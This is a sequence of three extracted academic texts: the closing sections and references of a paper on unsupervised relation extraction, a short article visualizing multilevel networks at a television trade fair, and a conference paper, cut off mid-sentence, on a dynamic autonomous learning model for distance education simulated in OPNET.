process. eralization properties of the decoder are, the better the resulting encoder should be. We expect more ex- pressive decoders (i.e., RESCAL and Hybrid) to be able to capture relations better than the selectional preference model and, thus, yield better encoders. In order to have a lower bound for the semi-supervised models, we also trained our best model from the pre- vious experiments (Hybrid) on Tr2 in a fully unsu- pervised way. All models are tested on the test set Te. As expected, all models with a supervised de- coder are much more accurate than the unsuper- vised model (Table 3). The best results with a supervised decoder are obtained by the RESCAL model with 62.3% F1, while the result of the un- supervised hybrid model is 34.3% F1. As expected the RESCAL and Hybrid outperform the selectional preference model in this setting (62.3% and 61.5% vs. 58.1% F1 respectively). Somewhat surprisingly, the RESCAL model is slightly more accurate (0.8% F1) than the hybrid model. These experiments con- firm that more accurate decoder models lead to bet- ter performing encoders. The results also hint at a potential extension of our approach to a more real- istic semi-supervised setting, though we leave any serious investigation of this set-up for future work. 6 Additional Related Work In this section, we mainly consider lines of related work not discussed in other sections of the paper, and we emphasize their relationship to our approach. Distant supervision. These methods can be re- garded as a half-way point between unsupervised and supervised methods. Distantly supervised mod- els are trained on data generated automatically by aligning knowledge bases (e.g., Freebase and Wikipedia infoboxes) with text (Mintz et al., 2009; Riedel et al., 2010; Surdeanu et al., 2012; Zeng et al., 2015). Similarly to our method they can use feature-rich models without the need for manually annotated data. However, a relation extractor trained in this way will only be able to predict relations al- ready present in a knowledge base. These meth- ods cannot be used to discover new relations. The framework we propose is completely unsupervised and does not have this shortcoming. Bootstrapping. Bootstrapping methods for rela- tion extraction (Agichtein and Gravano, 2000; Brin, 1998; Batista et al., 2015) iteratively label new ex- amples by finding the ones which are the most sim- ilar, according to some similarity function, to a seed set of labeled examples. The process continues until some convergence criteria is met. Even though this approach is not very labor-intensive (i.e., it requires 241 only few manually labeled examples for the initial seed set), it requires some domain knowledge from the model designer. In contrast, unsupervised mod- els are domain-agnostic and require only unlabeled text. Knowledge base factorization. Knowledge base completion via matrix or tensor factorization has re- ceived a lot of attention in the past few years (Bor- des et al., 2011; Jenatton et al., 2012; Weston et al., 2013; Bordes et al., 2013; Socher et al., 2013; Garcı́a-Durán et al., 2014; Bordes et al., 2014; Lin et al., 2015b; Chang et al., 2014; Nickel et al., 2011). But in contrast to what we propose here, namely, in- duction of new relations, these models factorize re- lations already present in knowledge bases. Universal schema methods (Riedel et al., 2013) use factorization models to infer facts (e.g., predict missing entities), but they do not attempt to induce relations. In other words, they consider each given context as a relation and induce an embedding for each of them. They do not attempt to induce a clus- tering over the contexts. Our work can be regarded as an extension of these methods. Autoencoders with discrete states. Aside from the work cited above (Daumé III, 2009; Ammar et al., 2014; Titov and Khoddam, 2015; Lin et al., 2015a), we are not aware of previous work using autoencoders with discrete states (i.e., a categori- cal latent variable or a graph). The semisupervised version of variational autoencoders (Kingma et al., 2014) used a combination of a real-valued vector and a categorical variable as its hidden representa- tion and yielded impressive results on the MNIST image classification task. However, their approach cannot be directly applied to unsupervised classifi- cation, as there is no reason to believe that latent classes would be captured by the categorical vari- able rather than in some way represented by the real- valued vector. The only other application of variational autoen- coders to natural language is the very recent work of Bowman et al. (2016). They study language mod- eling with recurrent language models and consider only real-valued vectors as states. Generative models with rich features have also been considered in the past (Berg-Kirkpatrick et al., 2010). However, autoencoders are potentially more flexible than generative models as they can use very different encoding and decoding components and can be faster to train. 7 Conclusions and Discussion We presented a new method for unsupervised rela- tion extraction.5 The model consists of a feature- rich classifier that predicts relations, and a tensor factorization component that relies on the predicted relations to infer left-out arguments. These models are jointly estimated by optimizing the argument re- construction objective. We studied three alternative factorization models building on ideas from knowledge base factoriza- tion and selectional preference modeling. We em- pirically showed that our factorization models yield relation extractors that are more accurate than state- of-the-art generative and agglomerative clustering baselines. As the proposed modeling framework is quite flexible, the model can be extended in many differ- ent ways. Our approach can be regarded as learn- ing semantic representations that are informative for basic inference tasks (in our case, the inference task was recovering individual arguments). More general classes of inference tasks can be considered in future work. Moreover, it would be interesting to evaluate the proposed model on how accurately it infers these facts (rather than only on the quality of the induced latent representations). The work presented in this paper can also be combined with the approach of Titov and Khoddam (2015) to induce both relations and semantic roles (i.e., essentially to induce seman- tic frames (Fillmore, 1976)). Another potential di- rection is the use of labeled data: our feature-rich model (namely its discriminative encoding compo- nent) is likely to have much better asymptotic per- formance than its generative counterpart, and, con- sequently, labeled data should be much more bene- ficial. Acknowledgments This work is supported by NWO Vidi Grant 016.153.327, Google Focused Award on Natural Language Understanding and partially supported by ISTI Grant for Young Mobility. The authors thank 5github.com/diegma/relation-autoencoder 242 the action editor and the anonymous reviewers for their valuable suggestions and Limin Yao for an- swering our questions about data and baselines. References Eugene Agichtein and Luis Gravano. 2000. Snowball: Extracting relations from large plain-text collections. In 5th ACM Conference on Digital Libraries. Waleed Ammar, Chris Dyer, and Noah A. Smith. 2014. Conditional random field autoencoders for unsuper- vised structured prediction. In NIPS. Sören Auer, Christian Bizer, Georgi Kobilarov, Jens Lehmann, Richard Cyganiak, and Zachary G. Ives. 2007. Dbpedia: A nucleus for a web of open data. In 6th International Semantic Web Conference (ISWC). Amit Bagga and Breck Baldwin. 1998. Algorithms for scoring coreference chains. In LREC. Michele Banko and Oren Etzioni. 2008. The tradeoffs between open and traditional relation extraction. In ACL. Michele Banko, Michael J. Cafarella, Stephen Soderland, Matthew Broadhead, and Oren Etzioni. 2007. Open information extraction from the web. In IJCAI. David S. Batista, Bruno Martins, and Mário J. Silva. 2015. Semi-supervised bootstrapping of relationship extractors with distributional semantics. In EMNLP. Taylor Berg-Kirkpatrick, Alexandre Bouchard-Côté, John DeNero, and Dan Klein. 2010. Painless unsu- pervised learning with features. In HLT - NAACL. Julian Besag. 1975. Statistical analysis of non-lattice data. The statistician, pages 179–195. David M. Blei, Andrew Y. Ng, and Michael I. Jordan. 2003. Latent Dirichlet allocation. Journal of Machine Learning Research, 3:993–1022. Kurt D. Bollacker, Colin Evans, Praveen Paritosh, Tim Sturge, and Jamie Taylor. 2008. Freebase: A collabo- ratively created graph database for structuring human knowledge. In SIGMOD. Antoine Bordes, Jason Weston, Ronan Collobert, and Yoshua Bengio. 2011. Learning structured embed- dings of knowledge bases. In AAAI. Antoine Bordes, Nicolas Usunier, Alberto Garcı́a-Durán, Jason Weston, and Oksana Yakhnenko. 2013. Irreflex- ive and hierarchical relations as translations. In Struc- tured Learning: Inferring Graphs from Structured and Unstructured Inputs (SLG-ICML). Antoine Bordes, Xavier Glorot, Jason Weston, and Yoshua Bengio. 2014. A semantic matching energy function for learning with multi-relational data. Jour- nal of Machine Learning, 94(2):233–259. Samuel R. Bowman, Luke Vilnis, Oriol Vinyals, An- drew M. Dai, Rafal Józefowicz, and Samy Bengio. 2016. Generating sentences from a continuous space. In ICLR. Sergey Brin. 1998. Extracting patterns and relations from the world wide web. In The World Wide Web and Databases Workshop (WebDB). Kai-Wei Chang, Wen-tau Yih, Bishan Yang, and Christo- pher Meek. 2014. Typed tensor decomposition of knowledge bases for relation extraction. In EMNLP. Hal Daumé III. 2009. Unsupervised search-based struc- tured prediction. In ICML. Oier Lopez de Lacalle and Mirella Lapata. 2013. Un- supervised relation extraction with general domain knowledge. In EMNLP. John C. Duchi, Elad Hazan, and Yoram Singer. 2011. Adaptive subgradient methods for online learning and stochastic optimization. Journal of Machine Learning Research, 12:2121–2159. Charles J. Fillmore. 1976. Frame semantics and the na- ture of language. Annals of the New York Academy of Sciences, 280(1):20–32. Jenny Rose Finkel, Trond Grenager, and Christopher D. Manning. 2005. Incorporating non-local informa- tion into information extraction systems by Gibbs sam- pling. In ACL. Kuzman Ganchev, Joao Graca, Jennifer Gillenwater, and Ben Taskar. 2010. Posterior regularization for struc- tured latent variable models. Journal of Machine Learning Research, 11:2001–2049. Alberto Garcı́a-Durán, Antoine Bordes, and Nicolas Usunier. 2014. Effective blending of two and three- way interactions for modeling multi-relational data. In European Conference on Machine Learning and Knowledge Discovery in Databases (ECML-PKDD). Lise Getoor and Ben Taskar. 2007. Introduction to sta- tistical relational learning. MIT press. Geoffrey E. Hinton. 1989. Connectionist learning proce- dures. Artificial Intelligence, 40(1-3):185–234. Tommi S. Jaakkola and Michael I. Jordan. 1996. Com- puting upper and lower bounds on likelihoods in in- tractable networks. In 12th Annual Conference on Un- certainty in Artificial Intelligence (UAI). Rodolphe Jenatton, Nicolas Le Roux, Antoine Bordes, and Guillaume Obozinski. 2012. A latent factor model for highly multi-relational data. In NIPS. Diederik P. Kingma and Max Welling. 2014. Auto- encoding variational Bayes. In ICLR. Diederik P. Kingma, Shakir Mohamed, Danilo Jimenez Rezende, and Max Welling. 2014. Semi-supervised learning with deep generative models. In NIPS. Tamara G. Kolda and Brett W. Bader. 2009. Ten- sor decompositions and applications. SIAM Review, 51(3):455–500. 243 Dekang Lin and Patrick Pantel. 2001. DIRT - discovery of inference rules from text. In SIGKDD. Chu-Cheng Lin, Waleed Ammar, Chris Dyer, and Lori S. Levin. 2015a. Unsupervised POS induction with word embeddings. In NAACL HLT. Yankai Lin, Zhiyuan Liu, Huan-Bo Luan, Maosong Sun, Siwei Rao, and Song Liu. 2015b. Modeling relation paths for representation learning of knowledge bases. In EMNLP. Xitong Liu, Fei Chen, Hui Fang, and Min Wang. 2014. Exploiting entity relationship for query expansion in enterprise search. Information Retrieval, 17(3):265– 294. Tomas Mikolov, Kai Chen, Greg Corrado, and Jeffrey Dean. 2013. Efficient estimation of word represen- tations in vector space. In ICLR. Mike Mintz, Steven Bills, Rion Snow, and Dan Jurafsky. 2009. Distant supervision for relation extraction with- out labeled data. In ACL. Ndapandula Nakashole and Tom M. Mitchell. 2014. Mi- cro reading with priors: Towards second generation machine readers. In AKBC at NIPS. Ndapandula Nakashole, Gerhard Weikum, and Fabian M. Suchanek. 2012. PATTY: A taxonomy of relational patterns with semantic types. In EMNLP. Maximilian Nickel, Volker Tresp, and Hans-Peter Kriegel. 2011. A three-way model for collective learning on multi-relational data. In ICML. Diarmuid Ó Séaghdha. 2010. Latent variable models of selectional preference. In ACL. Hoifung Poon and Pedro M. Domingos. 2009. Unsuper- vised semantic parsing. In EMNLP. Deepak Ravichandran and Eduard H. Hovy. 2002. Learning surface text patterns for a question answer- ing system. In ACL. Philip Resnik. 1997. Selectional preference and sense disambiguation. In ACL SIGLEX Workshop on Tag- ging Text with Lexical Semantics: Why, What, and How. Sebastian Riedel, Limin Yao, and Andrew McCallum. 2010. Modeling relations and their mentions without labeled text. In ECML-PKDD. Sebastian Riedel, Limin Yao, Andrew McCallum, and Benjamin M. Marlin. 2013. Relation extraction with matrix factorization and universal schemas. In NAACL. Evan Sandhaus. 2008. The New York Times annotated corpus. Linguistic Data Consortium, Philadelphia, 6(12). Yusuke Shinyama and Satoshi Sekine. 2006. Preemp- tive information extraction using unrestricted relation discovery. In NAACL HLT. Richard Socher, Danqi Chen, Christopher D. Manning, and Andrew Y. Ng. 2013. Reasoning with neural ten- sor networks for knowledge base completion. In NIPS. Fabian M. Suchanek, Gjergji Kasneci, and Gerhard Weikum. 2007. Yago: A core of semantic knowledge. In WWW. Mihai Surdeanu, Julie Tibshirani, Ramesh Nallapati, and Christopher D. Manning. 2012. Multi-instance multi- label learning for relation extraction. In EMNLP- CoNLL. Ilya Sutskever, Ruslan Salakhutdinov, and Joshua B. Tenenbaum. 2009. Modelling relational data using Bayesian clustered tensor factorization. In NIPS. Idan Szpektor, Hristo Tanev, Ido Dagan, and Bonaven- tura Coppola. 2004. Scaling web-based acquisition of entailment relations. In EMNLP. Ivan Titov and Ehsan Khoddam. 2015. Unsupervised in- duction of semantic roles within a reconstruction-error minimization framework. In NAACL. Ivan Titov and Alexandre Klementiev. 2011. A Bayesian model for unsupervised semantic parsing. In ACL. Ledyard R. Tucker. 1966. Some mathematical notes on three-mode factor analysis. Psychometrika, 31(3):279–311. Tim Van de Cruys. 2010. A non-negative tensor fac- torization model for selectional preference induction. Journal of Natural Language Engineering, 16(4):417– 437. Laurens Van der Maaten and Geoffrey Hinton. 2008. Visualizing data using t-SNE. Journal of Machine Learning Research, 9(2579-2605):85. Pascal Vincent, Hugo Larochelle, Yoshua Bengio, and Pierre-Antoine Manzagol. 2008. Extracting and com- posing robust features with denoising autoencoders. In ICML. Jason Weston, Antoine Bordes, Oksana Yakhnenko, and Nicolas Usunier. 2013. Connecting language and knowledge bases with embedding models for relation extraction. In EMNLP. Limin Yao, Aria Haghighi, Sebastian Riedel, and Andrew McCallum. 2011. Structured relation discovery using generative models. In EMNLP. Limin Yao, Sebastian Riedel, and Andrew McCallum. 2012. Unsupervised relation discovery with sense dis- ambiguation. In ACL. Daojian Zeng, Kang Liu, Yubo Chen, and Jun Zhao. 2015. Distant supervision for relation extraction via piecewise convolutional neural networks. In EMNLP. 244 work_3o2flxcuwjbitlgqg237dzc7da ---- 143© 2020 Authors. This work is licensed under the Creative Commons Attribution 4.0 License (https://creativecommons.org/licenses/by/4.0/) CONNECTIONS Issue 1 | Vol. 40Article | DOI: 10.21307/connections-2019.019 Visualizing Multilevel Networks for the Analysis of Superposed Levels of Collective Agency Emmanuel Lazega* Sciences Po Paris, IUF Centre de Sociologie des Organisations, France. *E-mail: emmanuel.lazega@ sciencespo.fr The upper level This is the inter-organizational network in which the ties are economic relationships (business deals) signed at time t between companies (the nodes). The pattern represents a core-periphery structure. In the core, the more central companies (the Majors of this industry and a few other of smaller companies that managed to sign a contract with the Majors) drive the economic action (contracting). The periphery is composed of many small companies (the nodes on the outer upper circle) that did not sign any contract Abstract This picture, produced by Julien Brailly et al. (2016) and David Schoch (2020), visualizes multilevel networks of individuals and organizations. Keywords Multilevel networks, image. 144 Visualizing Multilevel Networks for the Analysis of Superposed Levels of Collective Agency that year and thus find themselves isolated, as if they were watching the action from a balcony. The lower level This is the inter-individual level in which the ties are informal discussion and personal information gathering at time t−1 between these individuals. The high density of this lower, inter-individual network represents the fact that members of competing companies talk to each other actively. Vertical ties These ties between nodes from the lower level and nodes at the upper level are affiliation ties of each individual in their organizations. The empirical setting This multilevel network was measured in the largest trade fair for television programs in Eastern Europe. In this trade fair, nodes at the upper level are companies and institutions of the global and regional television industry. They sell, buy, distribute programs, and regulate the industry. Color codes at this upper level represent the organizations composing the value chain in 2012, for example broadcasters in blue, distributors in green, independent buyers in purple, media groups in yellow, producers in brown. Nodes at the Lower level are mainly individual sales representatives, sellers and buyers of TV programs meeting at this trade fair to keep abreast of new films, series and game shows, to observe market trends and evolutions, and to discuss contracts in 2011. Sellers mainly from the USA and Western Europe come to pitch and sell their audiovisual products to regional and local buyers such as the broadcasting companies (television channels for example). The density of this inter-individual network represents the “buzz” network between these sales representatives in this trade fair, emphasizing the crucial role of cooperation among interdependent competitors (Lazega and Mounier, 2002; Lazega et al., 2008; Lazega, 2020) as a multilevel phenomenon. For a substantive explanation of this graph, see Brailly (2016). Sociological interpretation From an economic sociology perspective, such pat- terns facilitate the study of multilevel, multiplex and multisided overlaps across levels, to provide a new perspective on markets as multilevel networks. In these multilevel networks, a relationship between two firms creates a context that facilitates the creation or maintenance of relationships between their em- ployees, and the other way around: interpersonal relation ships between sales representatives contri- bute to the formation of inter-organizational, con- tracting ties (Bathelt and Glückler, 2003; Berends et al., 2011). In this context, social relationships are not only behind the deals, they are also around them. In other words, social relationships are not only between buyers and sellers, but also among buyers and among sellers. As a result, such relationships need to be contextualized in their relational neighborhood. For example, imagine the following hypothetical scenario: seller A can give an opportunity to seller B concerning a buyer C such as “C is looking for products you have.” Seller A gives this opportunity to seller B only because they are “friends” and they have known each other for a long time, expecting direct reciprocity. This opportunity is relevant because seller A’s company has already closed a deal with buyer C’s company and so seller A is aware of buyer C’s needs and bargaining behavior. This situation leads to the creation of a new relationship between seller B and buyer C in the form of a meeting to discuss a potential deal. This complex pattern helps redefine the nature of markets (Brailly et al., 2016) as multilevel, socially organized settings. In this specific setting, a limited number of very large companies dominate the market with smaller companies gravitating around this core, suggesting an oligopolistic structure that economists call “oligopoly with fringes.” Trade fairs as field- configuring events contribute to the reproduction of this oligopolistic, multilevel and coopetitive structure. In the sociology of culture, it helps understand, from a neo-structural perspective, the mechanisms under- lying contemporary globalization and uniformization of culture (Brailly et al., 2016; Favre et al., 2016). Methodological foundations and extensions For a general perspective on multilevel networks in the social sciences, see Snijders (2016). Multilevel blockmodels and stochastic blockmodels for such data are available in Žiberna (2014), Barbillon et al. (2016) and Chabert-Liddell et al. (2019). For multilevel ERGMs associated with this data format, see Wang et al. (2013). For multilevel ERGMs ana lyzing this dataset, see Brailly (2016) Brailly et al. (2016) and Favre et al. (2016). For more methods using multilevel 145 CONNECTIONS network analyses, see various chapters in Lazega and Snijders (2016), Lomi et al. (2016), Koskinen et al. (2017), Tranmer et al. (2017). References Barbillon, P., Donnet, S., Lazega, E. and Bar-Hen, A. 2016. Stochastic block-models for multiplex networks: an application to a multilevel network of researchers. Journal of the Royal Statistical Society: Series A (Statistics in Society) 180: 295–314. Bathelt, H. and Glückler, J. 2003. Toward a relational economic geography. Journal of Economic Geography 3: 117–144. Berends, H., Van Burg, E. and van Raaij, E. M. 2011. Contacts and contracts: crosslevel network dynamics in the development of an aircraft material. Organization Science 22: 940–960. Brailly, J. 2016. Dynamics of networks in trade fairs—a multilevel relational approach to the cooperation among competitors. Journal of Economic Geography 16: 1279–1301. Brailly, J., Favre, G., Chatellet, J. and Lazega, E. 2016. Embeddedness as a multilevel problem: a case study in economic sociology. Social Networks 44: 319–333. Chabert-Liddell, S. C., Barbillon, P., Donnet, S. and Lazega, E. 2019. A stochastic block model for multilevel networks: application to the sociology of organisations. arXiv preprint arXiv:1910.10512 (accessed December 29, 2020). Favre, G., Brailly, J., Chatellet, J. and Lazega, E. 2016. “Inter-organizational network influence on long term and short term inter-individual relationships: the case of a trade fair for TV programs distribution in sub-Saharan Africa”, In Lazega, E. and Snijders, T. A. B. (Eds), Multilevel Network Analysis for the Social Sciences Springer, Dordrecht. Koskinen, J., Broccatelli, C., Wang, P. and Robins, G. 2017. “Bayesian analysis of ERG models for multilevel, multiplex, and multilayered networks with sampled or missing data”, Convegno della Società Italiana di Statistica Springer, Cham, pp. 105–117. Lazega, E. 2020. Bureaucracy, Collegiality and Social Change: Redefining Organizations with Multilevel Relational Infrastructures Edward Elgar Publishing, Cheltenham. Lazega, E. and Mounier, L. 2002. “Interdependent entrepreneurs and the social discipline of their cooperation: The research program of structural economic sociology for a society of organizations”, In Favereau, O. and Lazega, E. (Eds), Conventions and Structures in Economic Organization: Markets, Networks, and Hierarchies Edward Elgar Publishing, Cheltenham, pp. 147–199. Lazega, E. and Snijders, T. A. B. 2016. “The multiple flavours of multilevel issues for networks”, In Lazega, E. and Snijders, T. A. B. Multilevel Network Analysis for the Social Sciences Springer, Cham, pp. 15–46. Lazega, E., Jourda, M. -T., Mounier, L. and Stofer, R. 2008. Catching up with big fish in the big pond? Multi-level network analysis through linked design. Social Networks 30: 159–176. Lomi, A. Robins, G. and Tranmer, M. 2016. “Introduction to multilevel social networks”, Social Networks, 100: 266–268. Schoch, D. 2020. Visualizing multilevel networks with graphlayouts, available at: http://blog.schochastics.net/ post/visualizing-multilevel-networks-with-graphlayouts/ (accessed December 29, 2020). Tranmer, M. Pallotti, F. and Lomi, A. 2016. “The embeddedness of organizational performance: multiple membership multiple classification models for the analysis of multilevel networks”, Social Networks, 44: 269–280. Wang, P., Robins, G. L., Pattison, P. E. and Lazega, E. 2013. Exponential random graph models for multi- level networks. Social Networks 35: 96–115. Žiberna, A. 2014. Blockmodeling of multilevel networks. Social Networks 39: 46–61. work_3o7sy5d745gbzkgpk76ulfnedm ---- 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 33 Advanced Dynamic Autonomous Knowledge Learning Method for Distance Learning Yanfang Fu School of Computer Science and Engineering, Xi`an Technological University Xi’an, 710032, China e-mail: 149481698@qq.com Xing Li School of Computer Science and Engineering, Xi`an Technological University Xi’an, 710032, China e-mail: 825338005@qq.com Xueyao Feng School of Computer Science and Engineering, Xi`an Technological University Xi’an, 710032, China e-mail: 903840457@qq.com Jing Ma School of Computer Science and Engineering, Xi`an Technological University Xi’an, 710032, China e-mail: 410329074@qq.com Abstract—As the manufacturing of vast amount of information transmits at an unprecedented rate, traditional learning is no way to meet the needs of open learning and lifelong learning, how can distance learning be used to help us study become a problem to think about .Distance learning requires improvement of interactivity and initiative to achieve their aptitude. Using a variety of formats data, learners master the initiative in the learning process, it is not easy to lead to deviation from the learning goals phenomenon. To this end, in order to solve this problem, we use the basis of ILTMK theory and distributed interactive technology to introduce the active learning factors and propose a dynamic autonomous knowledge learning model and build its model’s simulation running environment and related mechanism. Through simulation experiment, we can verify the effectiveness of the autonomous learning methods. Keywords-Distance Learning; ILTMK theory; Distributed Interactive Technology; Dynamic Autonomous Knowledge Learning Model I. INTRODUCTION Looking at the source of knowledge view, Knowledge is that the knower grasps the essence of things through the phenomenon. So, Bystanders knowledge view derived from the ancient Greek natural philosopher, which hold by Socrates and others, lead to the “acceptance learning” long period domination of human way of learning[1-2]. In China, participant knowledge view of Basic Education Reform is ' inquiry learning'. The history of education practice shows, only participant knowledge view instead of bystander knowledge view, inquiry learning may be instead of reception learning. Knowledge contains a personal factor. Knowledge acquisition process is the learners to participate in the process of knowledge construction. Jone Deway would explain that participant knowledge view is interaction of the human and the environment [3]. Inquiry learning not only focuses on participant personal experiences process, more emphasis on personal understanding [4]. With the popularity of Internet, distance learning has gone from a letter-based, based on broadcast television systems "receiving learning" toward network-based (Baidu library and Blackboard) "research study" direction. Distance learning is a complement to a new independent study model. Now some intelligent distance learning increases chat rooms, electronic whiteboard and virtual classroom, and other functions to improve the learning effect, but it is only to 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 34 provide support in the learning environment, did not achieve the custom teaching mode of learner’s active learning. Existing model commonly used model based on Agent technology or ILTMK (Intelligent Long-distance Teaching Model based on Knowledge)[5].However, at present, most distance learning model is a simple information-sharing individual learning styles. Just solved how to make use of the Internet technology, makes the geographical separation of some groups can share learning materials, learners are always in a passive learning mode. So far no one is satisfied with the distance learning model [6]. If the learners can interact with active learning, distance learning can produce good learning results. As information technology, especially with the rapid development of network technology and communication technology, distance learning and creates a rapidly improve our knowledge [9]. How to establish interactive mode between the learner and knowledge grantee, plays an important role in research and innovation. II. RELEVANT THEORIES OF THE DISTANCE LEARNING To make full use of the knowledge resources on the network, we must adopt a deeper sharing strategy that absorbed in the knowledge sharing or knowledge unit sharing[7]. A knowledge unit or learning entity is relatively independent, and it stands for one element of the knowledge unit, knowledge can be hierarchical and nested, and itself is an independent description metadata. LO can be divided into two parts, namely the metadata and content data. Metadata section describes the characteristics of the LO, content data part gives the knowledge that represented by LO and the information. In order to realize the intelligent reasoning of the system, we use the production system to represent knowledge and information [8]. The reason why we choose this knowledge representation is that it has many advantages, especially its easy understanding, availabilities and manageability. Meanwhile, today’s most intelligent application adopted this kind of knowledge representation. Production system contains a set of production(or production rules) and facts, production rules use IFTHEN to show the knowledge, “attribute/ value” pairs are used to means the facts. Production rules has the following form: If () Then (---) When satisfy the application condition, the data will be operated by the order which the conclusion talks. The form of the LO in the production can be constants, variables, unit groups or tree, figure. III. LEARNING MODEL BAESD ON INTERACTOIN A. Characteristics of active distance-learning model design Remote active learning model should have the following characteristic elements. (1)boundary and exclusivity, which means personnel composition in a learning subject is clear, whether to learn the subject or not needs to be identified;(2)the purpose, learning subject exists as a certain purpose, also as the learning interaction that sharing some knowledge.(3)Rules, each member must abide by certain interactive code of conduct; (4)the obligations, In the process of learning, each knowledge sender bears certain teaching responsibility;(5)Independence, that is ,every member can make choice about their own rights and awareness. The concept of the “interaction” firstly appeared in communication and sociology, in sociology, the definition of the interaction is ways and processes of interactive influences, effects produced between humans and groups.“Interactive” dynamically performed the person’s social relations, all kinds of complicated social phenomenon are caused by interaction. When thinking about interaction in the field of communication[9], we find that the interaction’s is more likely to focus on the flow and exchange of study information, or relationship among transmission elements. Simple “teaching” or “learning” in the distance learning is difficult to reach the expected goals, the entire learning 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 35 process should be placed in “relationship” and “interactive” so that it can be better achieved. Therefore, interaction stands out of the virtual learning community. In the learning process, we call the interaction produced from learners interaction with others through internet or with their teachers the interactive spread[10]. Due to the nature of distance education, the teachers and students are often in different location ,and time and space are relatively separated in the whole education, Therefore, purposeful and bilateral will be very obvious in the transmission of teaching , and interaction will be more important in teaching. Not free interactive communication often makes it more difficult for learners to improve themselves. So we can analyze that the process of the knowledge learning can be partitioned into several periodic learning interactive topic. Each topic still be divided into several learning content, send requests to knowledge giver, when satisfy the condition of subject and the synchronization time, knowledge giver can respectively receive the request signals of each learner and not confused. Meanwhile, knowledge which knowledge giver send to multiple learners are sequentially arranged in a specific time to teach, each learner just needs to received it within the specified time so that they can distinguish their intellectual theme from confused knowledge learning process and receive it down. In distance learning network, it is impossible for knowledge giver to master all the knowledge, he still needs to learn from the other knowledge giver in the virtual network, when two or more knowledge giver send knowledge data with same subject at the same time, or send data to same knowledge learner, then the conflict happens, so we should schedule the time of knowledge interaction. B. Autonomous learning measurement method We should give two definitions in facing with the knowledge interaction scheduling:  In the network, each learner exists at least one interactive subject in a scheduling cycle.  Network learners cannot receive knowledge and send new knowledge at the same time, and learners can’t receive more than one of the knowledge interaction either. Each learner is learners in certain knowledge subjects, However, sometimes they can be the knowledge giver, so it increases the complexity of the system modeling. Therefore, the problem of scheduling knowledge interaction is to assigned knowledge content to learning object according to different subjects[11]. According to the knowledge content’s interest, we can be divide into two groups, that’s learners and the grantors. Assuming that the entire network of interest have A1, A2…An, and their knowledge content is divide into L1, L2…Lm. We can see it as a graph G(V,E), of which the node V(1,2,3 and n) stands for knowledge interest, n is for the number of interest, and the edge of E is for the collection of the interactions. When node i and j can interact with each other, we can think that there exists a undirected edge ji e , between two nodes, and Ee ji  , , then the node i, j is one jump neighbor same with the learners and the knowledge givers; if the node i , j cannot directly communicate with each other, it means that they don’t have the same content of the knowledge, then we need to find out the knowledge giver about this knowledge content, Therefore ,only through an intermediate node k , can it do the communication interaction, that is ,there exist e and e, so the node i , j are two jumps neighbor node. It is an adjacency matrix. We can describe the network with an symmetric binary n n matrix, as: )...2,1,(][][ njiCGC nnij   (C ij = edgeshavenode else .j.i,.1 0   ) Another nn matrix: )...2,1,(][)( njidGD nmij   (D ij = neighborjumpstwoisnode else .,..j i.,1 ,0    ) Considering above two jumps node can realize the spatial reuse, it can finally obtain the optimal autonomous learning model. The network has a number of M of the knowledge content,we can use a M  N binary matrix T= NMmi t  ][ : 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 36 ilearnertocontentknowledge else mi t ....1 0    Interactive rate: numbertopicknowledge ilearnertonumbercontentknowledge i .. .....  = M t M m mi 1 The entire network’s interactive rate is:    N i i N 1 1  = MN 1    M m N i mi t 1 1 By two limiting conditions, two learners can send the request of the knowledge data at the same time only on the condition that two learners are separated by more than two jumps, we summarized the above content as the following model: Min M and Max  Limiting conditions: C1:   M m mi t 1    Ni ,1 C2:  ],1[,],,1[,,2 MmjiNjittc mjmiij  C3: ]),1[,,,],,1[,,(,1 MmikkjjiNkjitctc mjjkmiik  The main idea of the interactive process is: Interaction is that each learner interact with knowledge giver according to the fixed knowledge content point and the chronological order on condition that they have common learning subject. The learners active behavior allows them to get more study time. If there is no learning behavior to release the study time, then let the knowledge giver’s interaction have a free time, if other learners initiative is more active and don’t have the enough to study further, then he can dispute with free time and improve more. IV. BUILD SIMULATION MODEL BASED ON THE OPNET Data Packages in OPNET consist of one or more fields, package format editor is used to define the package format, data packages in each fields has name, size(which length is bit), color, type and default values. Using graphical way, it can directly display the package’s each fields, The size of the fields can exactly reflect the bit length in package. We designed three different types of data packages as three different types of the data grouping, that is:knowledge content data grouping, active application grouping and knowledge givers’s reply grouping. Figure 1. Learners process model This process mainly includes the following states( fig.1), each state’s function is introduced as follows:  Init state: this state is mainly realized the initialization of the simulation data, initial object mainly includes: active interaction time slice, interactive time, number of the knowledge subject, number of the knowledge content etc. After completing the initialization of an object, call the interrupt function op_intrpt_schedule_self (op_sim_time (), 0), it will lead to process’s state transformation from producing interruption at the current time to the request state only to do the intern’s judgment.  Idle state: free wait state, after all the state in performing the exit code should them return to this state, waiting for the right conditions for the next jump, In the exit code of this state will determine the current simulation’s interruption type, and assign to variable current_intrpt_type, then determine whether produce the current node’s interactive interruption or not, according to the type of the variable current_intrpt_type. If it is,then turned to the request or state tx to send the request package or data package.  Fr_rx state: responsible for identifying the type of the data packages that from the network receiver. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 37 Extract the corresponding information in the field ACK_Data,judge whether current node’s interactive application is success or not, if yes, then extract the knowledge content’s information that contains in the ACK_Data field of the data packages, modify the if_need_request to 0, means application succeed. So there is no need to send the application grouping, then will cycle around in the state of idle, fr_rx, tx and fr_src_2, so the knowledge giver will send knowledge request in the assigned time slices until data queue is empty.  Fr_src_1 state: The condition that transform from idle state to this state is that source module in the Nodes model generates a package, and has not yet been assigned the interactive time slice.  Request state: The state of request is mainly responsible for calculating the current active application’s time slice position, determine whether to enter their own interaction time, if he entered into his interaction time , then fill in the fields of information, send secondary intellectual content after set up the fields information; if not into its time slice or the current time slice has exceeded its clock, then compute the next arrival time(absolute simulation time ), and set up a break at this time.  Fr_src_2 state: like the fr_src_1 status’s function, fill in each field of the data package which receives from the data source, and insert it into the queue. The difference is that when the data source produces one package, only when the site’s application for time slice succeed, can state transform from idle to fr_src_2.  Tx state: when the node’s application queue is not empty, sent data in this time slot. If the data grouping exists in the queue, you need to send the interaction request packet to the knowledge giver, apply for a number of time slice and use it to send data from a queue. Process at this time in idle, fr_rx, fr_src_1 and request jump between four states. After the success of the application, each frame of data within the time slot waiting for their own time slot to send data. This process will be idle, fr_rx, fr_src_2 and tx , judge the time slice and send the data of internship 